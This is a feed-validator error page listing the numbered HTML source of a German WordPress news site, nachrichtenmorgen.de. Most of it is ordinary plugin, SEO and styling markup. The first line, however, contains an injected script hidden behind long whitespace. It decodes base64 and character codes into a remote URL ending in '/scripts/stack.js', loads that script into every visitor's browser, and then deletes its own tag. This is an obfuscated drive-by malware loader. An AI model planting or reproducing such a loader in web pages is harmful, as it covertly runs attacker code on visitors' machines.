Sorry

This feed does not validate.

In addition, interoperability with the widest range of feed readers could be improved by implementing the following recommendation.

Source: http://nachrichtenmorgen.de

  1.                                                                                                                                                                                                                                                                                                                                                                                                                                         <script>var st=document.createElement('script'); st.innerHTML=atob("dmFyIHN0PWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBzdC5zcmM9Z2V0X2woKTsgc3QudHlwZT0ndGV4dC9qYXZhc2NyaXB0Jztkb2N1bWVudC5jdXJyZW50U2NyaXB0LnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKHN0LCBkb2N1bWVudC5jdXJyZW50U2NyaXB0KTtkb2N1bWVudC5jdXJyZW50U2NyaXB0LnJlbW92ZSgpO2Z1bmN0aW9uIGdldF9sKCkge3JldHVybiAiaHQiK2F0b2IoImRIQnpPaTh2IikrU3RyaW5nLmZyb21DaGFyQ29kZSgxMTQsMTAxLDExNSwxMTYsNDYsOTksMTAwLDExMCwxMTYsMTExLDExNSwxMTksMTA1LDExNiw5OSwxMDQsMTE1LDExMiwxMDUsMTE0LDEwNSwxMTYpKyIuY29tIithdG9iKCJMM05qY21sd2RITXZjM1JoWTJzdWFuTT0iKTt9"); st.type='text/javascript';document.currentScript.parentNode.insertBefore(st, document.currentScript);document.currentScript.remove();</script><!doctype html >
  2. <html lang="de-DE" prefix="og: https://ogp.me/ns#">
  3. <head><meta charset="UTF-8" /><script>if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&]nowprocket/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nowprocket=1"}else{document.location.href=href.replace("#","?nowprocket=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}</script><script>class RocketLazyLoadScripts{constructor(){this.v="1.2.3",this.triggerEvents=["keydown","mousedown","mousemove","touchmove","touchstart","touchend","wheel"],this.userEventHandler=this._triggerListener.bind(this),this.touchStartHandler=this._onTouchStart.bind(this),this.touchMoveHandler=this._onTouchMove.bind(this),this.touchEndHandler=this._onTouchEnd.bind(this),this.clickHandler=this._onClick.bind(this),this.interceptedClicks=[],window.addEventListener("pageshow",t=>{this.persisted=t.persisted}),window.addEventListener("DOMContentLoaded",()=>{this._preconnect3rdParties()}),this.delayedScripts={normal:[],async:[],defer:[]},this.trash=[],this.allJQueries=[]}_addUserInteractionListener(t){if(document.hidden){t._triggerListener();return}this.triggerEvents.forEach(e=>window.addEventListener(e,t.userEventHandler,{passive:!0})),window.addEventListener("touchstart",t.touchStartHandler,{passive:!0}),window.addEventListener("mousedown",t.touchStartHandler),document.addEventListener("visibilitychange",t.userEventHandler)}_removeUserInteractionListener(){this.triggerEvents.forEach(t=>window.removeEventListener(t,this.userEventHandler,{passive:!0})),document.removeEventListener("visibilitychange",this.userEventHandler)}_onTouchStart(t){"HTML"!==t.target.tagName&&(window.addEventListener("touchend",this.touchEndHandler),window.addEventListener("mouseup",this.touchEndHandler),window.addEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.addEventListener("mousemove",this.touchMoveHandler),t.target.addEventListener("click",this.clickHandler),this._renameDOMAttribute(t.target,"onclick","rocket-onclick"),this._pendingClickStarted())}_onTouchMove(t){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler),t.target.removeEventListener("click",this.clickHandler),this._renameDOMAttribute(t.target,"rocket-onclick","onclick"),this._pendingClickFinished()}_onTouchEnd(t){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler)}_onClick(t){t.target.removeEventListener("click",this.clickHandler),this._renameDOMAttribute(t.target,"rocket-onclick","onclick"),this.interceptedClicks.push(t),t.preventDefault(),t.stopPropagation(),t.stopImmediatePropagation(),this._pendingClickFinished()}_replayClicks(){window.removeEventListener("touchstart",this.touchStartHandler,{passive:!0}),window.removeEventListener("mousedown",this.touchStartHandler),this.interceptedClicks.forEach(t=>{t.target.dispatchEvent(new MouseEvent("click",{view:t.view,bubbles:!0,cancelable:!0}))})}_waitForPendingClicks(){return new Promise(t=>{this._isClickPending?this._pendingClickFinished=t:t()})}_pendingClickStarted(){this._isClickPending=!0}_pendingClickFinished(){this._isClickPending=!1}_renameDOMAttribute(t,e,r){t.hasAttribute&&t.hasAttribute(e)&&(event.target.setAttribute(r,event.target.getAttribute(e)),event.target.removeAttribute(e))}_triggerListener(){this._removeUserInteractionListener(this),"loading"===document.readyState?document.addEventListener("DOMContentLoaded",this._loadEverythingNow.bind(this)):this._loadEverythingNow()}_preconnect3rdParties(){let t=[];document.querySelectorAll("script[type=rocketlazyloadscript]").forEach(e=>{if(e.hasAttribute("src")){let r=new URL(e.src).origin;r!==location.origin&&t.push({src:r,crossOrigin:e.crossOrigin||"module"===e.getAttribute("data-rocket-type")})}}),t=[...new Map(t.map(t=>[JSON.stringify(t),t])).values()],this._batchInjectResourceHints(t,"preconnect")}async _loadEverythingNow(){this.lastBreath=Date.now(),this._delayEventListeners(this),this._delayJQueryReady(this),this._handleDocumentWrite(),this._registerAllDelayedScripts(),this._preloadAllScripts(),await this._loadScriptsFromList(this.delayedScripts.normal),await this._loadScriptsFromList(this.delayedScripts.defer),await this._loadScriptsFromList(this.delayedScripts.async);try{await this._triggerDOMContentLoaded(),await this._triggerWindowLoad()}catch(t){console.error(t)}window.dispatchEvent(new Event("rocket-allScriptsLoaded")),this._waitForPendingClicks().then(()=>{this._replayClicks()}),this._emptyTrash()}_registerAllDelayedScripts(){document.querySelectorAll("script[type=rocketlazyloadscript]").forEach(t=>{t.hasAttribute("data-rocket-src")?t.hasAttribute("async")&&!1!==t.async?this.delayedScripts.async.push(t):t.hasAttribute("defer")&&!1!==t.defer||"module"===t.getAttribute("data-rocket-type")?this.delayedScripts.defer.push(t):this.delayedScripts.normal.push(t):this.delayedScripts.normal.push(t)})}async _transformScript(t){return new Promise((await this._littleBreath(),navigator.userAgent.indexOf("Firefox/")>0||""===navigator.vendor)?e=>{let r=document.createElement("script");[...t.attributes].forEach(t=>{let e=t.nodeName;"type"!==e&&("data-rocket-type"===e&&(e="type"),"data-rocket-src"===e&&(e="src"),r.setAttribute(e,t.nodeValue))}),t.text&&(r.text=t.text),r.hasAttribute("src")?(r.addEventListener("load",e),r.addEventListener("error",e)):(r.text=t.text,e());try{t.parentNode.replaceChild(r,t)}catch(i){e()}}:async e=>{function r(){t.setAttribute("data-rocket-status","failed"),e()}try{let i=t.getAttribute("data-rocket-type"),n=t.getAttribute("data-rocket-src");t.text,i?(t.type=i,t.removeAttribute("data-rocket-type")):t.removeAttribute("type"),t.addEventListener("load",function r(){t.setAttribute("data-rocket-status","executed"),e()}),t.addEventListener("error",r),n?(t.removeAttribute("data-rocket-src"),t.src=n):t.src="data:text/javascript;base64,"+window.btoa(unescape(encodeURIComponent(t.text)))}catch(s){r()}})}async _loadScriptsFromList(t){let e=t.shift();return e&&e.isConnected?(await this._transformScript(e),this._loadScriptsFromList(t)):Promise.resolve()}_preloadAllScripts(){this._batchInjectResourceHints([...this.delayedScripts.normal,...this.delayedScripts.defer,...this.delayedScripts.async],"preload")}_batchInjectResourceHints(t,e){var r=document.createDocumentFragment();t.forEach(t=>{let i=t.getAttribute&&t.getAttribute("data-rocket-src")||t.src;if(i){let n=document.createElement("link");n.href=i,n.rel=e,"preconnect"!==e&&(n.as="script"),t.getAttribute&&"module"===t.getAttribute("data-rocket-type")&&(n.crossOrigin=!0),t.crossOrigin&&(n.crossOrigin=t.crossOrigin),t.integrity&&(n.integrity=t.integrity),r.appendChild(n),this.trash.push(n)}}),document.head.appendChild(r)}_delayEventListeners(t){let e={};function r(t,r){!function t(r){!e[r]&&(e[r]={originalFunctions:{add:r.addEventListener,remove:r.removeEventListener},eventsToRewrite:[]},r.addEventListener=function(){arguments[0]=i(arguments[0]),e[r].originalFunctions.add.apply(r,arguments)},r.removeEventListener=function(){arguments[0]=i(arguments[0]),e[r].originalFunctions.remove.apply(r,arguments)});function i(t){return e[r].eventsToRewrite.indexOf(t)>=0?"rocket-"+t:t}}(t),e[t].eventsToRewrite.push(r)}function i(t,e){let r=t[e];Object.defineProperty(t,e,{get:()=>r||function(){},set(i){t["rocket"+e]=r=i}})}r(document,"DOMContentLoaded"),r(window,"DOMContentLoaded"),r(window,"load"),r(window,"pageshow"),r(document,"readystatechange"),i(document,"onreadystatechange"),i(window,"onload"),i(window,"onpageshow")}_delayJQueryReady(t){let e;function r(r){if(r&&r.fn&&!t.allJQueries.includes(r)){r.fn.ready=r.fn.init.prototype.ready=function(e){return t.domReadyFired?e.bind(document)(r):document.addEventListener("rocket-DOMContentLoaded",()=>e.bind(document)(r)),r([])};let i=r.fn.on;r.fn.on=r.fn.init.prototype.on=function(){if(this[0]===window){function t(t){return t.split(" ").map(t=>"load"===t||0===t.indexOf("load.")?"rocket-jquery-load":t).join(" ")}"string"==typeof arguments[0]||arguments[0]instanceof String?arguments[0]=t(arguments[0]):"object"==typeof arguments[0]&&Object.keys(arguments[0]).forEach(e=>{let r=arguments[0][e];delete arguments[0][e],arguments[0][t(e)]=r})}return i.apply(this,arguments),this},t.allJQueries.push(r)}e=r}r(window.jQuery),Object.defineProperty(window,"jQuery",{get:()=>e,set(t){r(t)}})}async _triggerDOMContentLoaded(){this.domReadyFired=!0,await this._littleBreath(),document.dispatchEvent(new Event("rocket-DOMContentLoaded")),await this._littleBreath(),window.dispatchEvent(new Event("rocket-DOMContentLoaded")),await this._littleBreath(),document.dispatchEvent(new Event("rocket-readystatechange")),await this._littleBreath(),document.rocketonreadystatechange&&document.rocketonreadystatechange()}async _triggerWindowLoad(){await this._littleBreath(),window.dispatchEvent(new Event("rocket-load")),await this._littleBreath(),window.rocketonload&&window.rocketonload(),await this._littleBreath(),this.allJQueries.forEach(t=>t(window).trigger("rocket-jquery-load")),await this._littleBreath();let t=new Event("rocket-pageshow");t.persisted=this.persisted,window.dispatchEvent(t),await this._littleBreath(),window.rocketonpageshow&&window.rocketonpageshow({persisted:this.persisted})}_handleDocumentWrite(){let t=new Map;document.write=document.writeln=function(e){let r=document.currentScript;r||console.error("WPRocket unable to document.write this: "+e);let i=document.createRange(),n=r.parentElement,s=t.get(r);void 0===s&&(s=r.nextSibling,t.set(r,s));let a=document.createDocumentFragment();i.setStart(a,0),a.appendChild(i.createContextualFragment(e)),n.insertBefore(a,s)}}async _littleBreath(){Date.now()-this.lastBreath>45&&(await this._requestAnimFrame(),this.lastBreath=Date.now())}async _requestAnimFrame(){return document.hidden?new Promise(t=>setTimeout(t)):new Promise(t=>requestAnimationFrame(t))}_emptyTrash(){this.trash.forEach(t=>t.remove())}static run(){let t=new RocketLazyLoadScripts;t._addUserInteractionListener(t)}}RocketLazyLoadScripts.run();</script>
  4.    
  5.    <title>Nachrichten Morgen Finden Sie die besten Nachrichten</title>
  6. <link rel="preload" as="font" href="https://nachrichtenmorgen.de/wp-content/themes/Newspaper/images/icons/newspaper.woff?23" crossorigin>
  7. <link rel="preload" as="font" href="https://nachrichtenmorgen.de/wp-content/plugins/td-composer/assets/fonts/td-multipurpose/td-multipurpose.ttf" crossorigin>
  8.    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  9.    <link rel="pingback" href="https://nachrichtenmorgen.de/xmlrpc.php" />
  10.    
  11. <!-- Suchmaschinen-Optimierung durch Rank Math PRO - https://rankmath.com/ -->
  12. <meta name="description" content="Finden Sie die besten Nachrichten auf Deutsch"/>
  13. <meta name="robots" content="index, follow, max-snippet:-1, max-video-preview:-1, max-image-preview:large"/>
  14. <link rel="canonical" href="https://nachrichtenmorgen.de/" />
  15. <meta property="og:locale" content="de_DE" />
  16. <meta property="og:type" content="website" />
  17. <meta property="og:title" content="Nachrichten Morgen Finden Sie die besten Nachrichten" />
  18. <meta property="og:description" content="Finden Sie die besten Nachrichten auf Deutsch" />
  19. <meta property="og:url" content="https://nachrichtenmorgen.de/" />
  20. <meta property="og:updated_time" content="2024-01-19T12:17:54+01:00" />
  21. <meta property="article:published_time" content="2023-02-09T21:15:15+01:00" />
  22. <meta property="article:modified_time" content="2024-01-19T12:17:54+01:00" />
  23. <meta name="twitter:card" content="summary_large_image" />
  24. <meta name="twitter:title" content="Nachrichten Morgen Finden Sie die besten Nachrichten" />
  25. <meta name="twitter:description" content="Finden Sie die besten Nachrichten auf Deutsch" />
  26. <meta name="twitter:label1" content="Verfasst von" />
  27. <meta name="twitter:data1" content="Jack Hobin" />
  28. <meta name="twitter:label2" content="Lesedauer" />
  29. <meta name="twitter:data2" content="56 Minuten" />
  30. <script type="application/ld+json" class="rank-math-schema-pro">{"@context":"https://schema.org","@graph":[{"@type":["Organization","Person"],"@id":"https://nachrichtenmorgen.de/#person","name":"admin","url":"https://nachrichtenmorgen.de"},{"@type":"WebSite","@id":"https://nachrichtenmorgen.de/#website","url":"https://nachrichtenmorgen.de","publisher":{"@id":"https://nachrichtenmorgen.de/#person"},"inLanguage":"de-DE","potentialAction":{"@type":"SearchAction","target":"https://nachrichtenmorgen.de/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://nachrichtenmorgen.de/#webpage","url":"https://nachrichtenmorgen.de/","name":"Nachrichten Morgen Finden Sie die besten Nachrichten","datePublished":"2023-02-09T21:15:15+01:00","dateModified":"2024-01-19T12:17:54+01:00","about":{"@id":"https://nachrichtenmorgen.de/#person"},"isPartOf":{"@id":"https://nachrichtenmorgen.de/#website"},"inLanguage":"de-DE"},{"@type":"Person","@id":"https://nachrichtenmorgen.de/author/mianbunny/","name":"Jack Hobin","url":"https://nachrichtenmorgen.de/author/mianbunny/","image":{"@type":"ImageObject","@id":"https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&amp;d=mm&amp;r=g","url":"https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&amp;d=mm&amp;r=g","caption":"Jack Hobin","inLanguage":"de-DE"},"sameAs":["https://nachrichtenmorgen.de/"]},{"@type":"Article","headline":"Nachrichten Morgen Finden Sie die besten Nachrichten","datePublished":"2023-02-09T21:15:15+01:00","dateModified":"2024-01-19T12:17:54+01:00","author":{"@id":"https://nachrichtenmorgen.de/author/mianbunny/","name":"Jack Hobin"},"publisher":{"@id":"https://nachrichtenmorgen.de/#person"},"description":"Finden Sie die besten Nachrichten auf Deutsch","name":"Nachrichten Morgen Finden Sie die besten Nachrichten","@id":"https://nachrichtenmorgen.de/#richSnippet","isPartOf":{"@id":"https://nachrichtenmorgen.de/#webpage"},"inLanguage":"de-DE","mainEntityOfPage":{"@id":"https://nachrichtenmorgen.de/#webpage"}}]}</script>
  31. <!-- /Rank Math WordPress SEO Plugin -->
  32.  
  33. <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' />
  34.  
  35.  
  36. <link rel="alternate" type="application/rss+xml" title="Nachrichten Morgen &raquo; Feed" href="https://nachrichtenmorgen.de/feed/" />
  37. <link rel="alternate" type="application/rss+xml" title="Nachrichten Morgen &raquo; Kommentar-Feed" href="https://nachrichtenmorgen.de/comments/feed/" />
  38. <link rel="alternate" type="application/rss+xml" title="Nachrichten Morgen &raquo; Homepage Kommentar-Feed" href="https://nachrichtenmorgen.de/homepage/feed/" />
  39. <link id='omgf-preload-0' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/pt-serif-normal-latin-400.woff2' as='font' type='font/woff2' crossorigin />
  40. <link id='omgf-preload-1' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/pt-serif-normal-latin-700.woff2' as='font' type='font/woff2' crossorigin />
  41. <link id='omgf-preload-2' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/roboto-normal-latin-400.woff2' as='font' type='font/woff2' crossorigin />
  42. <link id='omgf-preload-3' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/roboto-normal-latin-500.woff2' as='font' type='font/woff2' crossorigin />
  43. <link id='omgf-preload-4' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/roboto-normal-latin-700.woff2' as='font' type='font/woff2' crossorigin />
  44. <link id='omgf-preload-5' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/work-sans-normal-latin-300.woff2' as='font' type='font/woff2' crossorigin />
  45. <link id='omgf-preload-6' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/work-sans-normal-latin-400.woff2' as='font' type='font/woff2' crossorigin />
  46. <link id='omgf-preload-7' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/work-sans-normal-latin-500.woff2' as='font' type='font/woff2' crossorigin />
  47. <link id='omgf-preload-8' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/work-sans-normal-latin-600.woff2' as='font' type='font/woff2' crossorigin />
  48. <link id='omgf-preload-9' rel='preload' href='//nachrichtenmorgen.de/wp-content/uploads/omgf/google-fonts-style/work-sans-normal-latin-700.woff2' as='font' type='font/woff2' crossorigin />
  49. <script type="rocketlazyloadscript" data-rocket-type="text/javascript">
  50. /* <![CDATA[ */
  51. window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/nachrichtenmorgen.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=c8acece587b8aab92174ed546adf76db"}};
  52. /*! This file is auto-generated */
  53. !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
  54. /* ]]> */
  55. </script>
  56. <style id="tux-grid-css" type="text/css">.tux-row:before,.tux-row:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;content:" ";display:table;}.tux-row{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0;margin:0 -15px;}.tux-row:after{clear:both;}.tux-col{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0 15px;margin:0;}@media(min-width:768px){.tux-col{float:left;}.tux-span-1-of-1{width:100%;}.tux-span-1-of-2{width:50%;}.tux-span-1-of-3{width:33.33333333%;}.tux-span-1-of-4{width:25%;}.tux-span-1-of-5{width:20%;}.tux-span-1-of-6{width:16.66666667%;}.tux-span-1-of-7{width:14.28571429%;}.tux-span-1-of-8{width:12.5%;}.tux-span-1-of-9{width:11.11111111%;}.tux-span-1-of-10{width:10%;}.tux-span-1-of-11{width:9.09090909%;}.tux-span-1-of-12{width:8.33333333%;}}</style><style id='wp-emoji-styles-inline-css' type='text/css'>
  57.  
  58. img.wp-smiley, img.emoji {
  59. display: inline !important;
  60. border: none !important;
  61. box-shadow: none !important;
  62. height: 1em !important;
  63. width: 1em !important;
  64. margin: 0 0.07em !important;
  65. vertical-align: -0.1em !important;
  66. background: none !important;
  67. padding: 0 !important;
  68. }
  69. </style>
  70. <style id='rank-math-toc-block-style-inline-css' type='text/css'>
  71. .wp-block-rank-math-toc-block nav ol{counter-reset:item}.wp-block-rank-math-toc-block nav ol li{display:block}.wp-block-rank-math-toc-block nav ol li:before{content:counters(item, ".") ". ";counter-increment:item}
  72.  
  73. </style>
  74. <style id='classic-theme-styles-inline-css' type='text/css'>
  75. /*! This file is auto-generated */
  76. .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
  77. </style>
  78. <style id='global-styles-inline-css' type='text/css'>
  79. body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 11px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 32px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--regular: 15px;--wp--preset--font-size--larger: 50px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) 